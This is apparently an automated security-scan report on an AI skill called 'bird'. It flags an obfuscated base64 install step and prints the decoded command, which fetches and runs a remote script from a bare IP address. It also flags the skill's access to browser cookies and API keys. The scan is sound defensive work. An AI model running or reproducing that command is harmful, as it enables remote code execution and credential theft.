Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Obfuscated Remote Code Execution via Suspicious IP", and "Skill designed to access sensitive browser data and API keys".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell.** Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-ar/SKILL.md:10 |
| CRITICAL | **Obfuscated Remote Code Execution via Suspicious IP.** The macOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from a non-standard, potentially malicious IP address (`91.92.242.30`) directly into the user's shell. This is a severe supply chain risk and command injection vulnerability, and it uses obfuscation to hide its true intent. The downloaded script could perform any action, including installing malware, exfiltrating sensitive data (like browser cookies or API keys mentioned later in the skill description), or establishing persistence. Remove the obfuscated command. Provide a clear, verifiable, and secure installation method, preferably through official package managers or signed binaries from trusted sources. If a script is necessary, it should be hosted on a trusted domain, its contents should be auditable, and its execution should be explicitly confirmed by the user. | LLM | SKILL.md:14 |
| HIGH | **Skill designed to access sensitive browser data and API keys.** The skill description explicitly states that it uses "Browser cookies (default: Firefox/Chrome)" and requires `SWEETISTICS_API_KEY`. Given the critical remote code execution vulnerability identified in the macOS installation, any malicious script executed could easily target and exfiltrate these sensitive browser cookies and API keys, leading to account compromise or unauthorized access. While the skill itself *needs* these for functionality, the insecure installation method makes them highly vulnerable targets. Address the critical remote code execution vulnerability first. Ensure the `bird` tool itself is open-source and auditable, or provided by a highly trusted vendor, to verify that it handles sensitive data securely and does not exfiltrate it. Implement robust security practices for handling credentials and sensitive data. | LLM | SKILL.md:29 |
| MEDIUM | **Download and execution of untrusted external binary.** The Windows installation instructions direct users to download a `.zip` file containing an executable (`OpenClawProvider-1.0.2.zip`) from a GitHub release page and run it. While GitHub releases can be legitimate, relying on an executable from an arbitrary repository without further verification (e.g., code signing, checksums, open-source auditability) introduces a supply chain risk. A compromised GitHub account or malicious executable could lead to system compromise. Provide checksums for downloaded binaries. Ideally, the `OpenClawProvider` should be open-source and buildable from source, or distributed via a trusted package manager with code signing. Users should be warned about running untrusted executables. | LLM | SKILL.md:10 |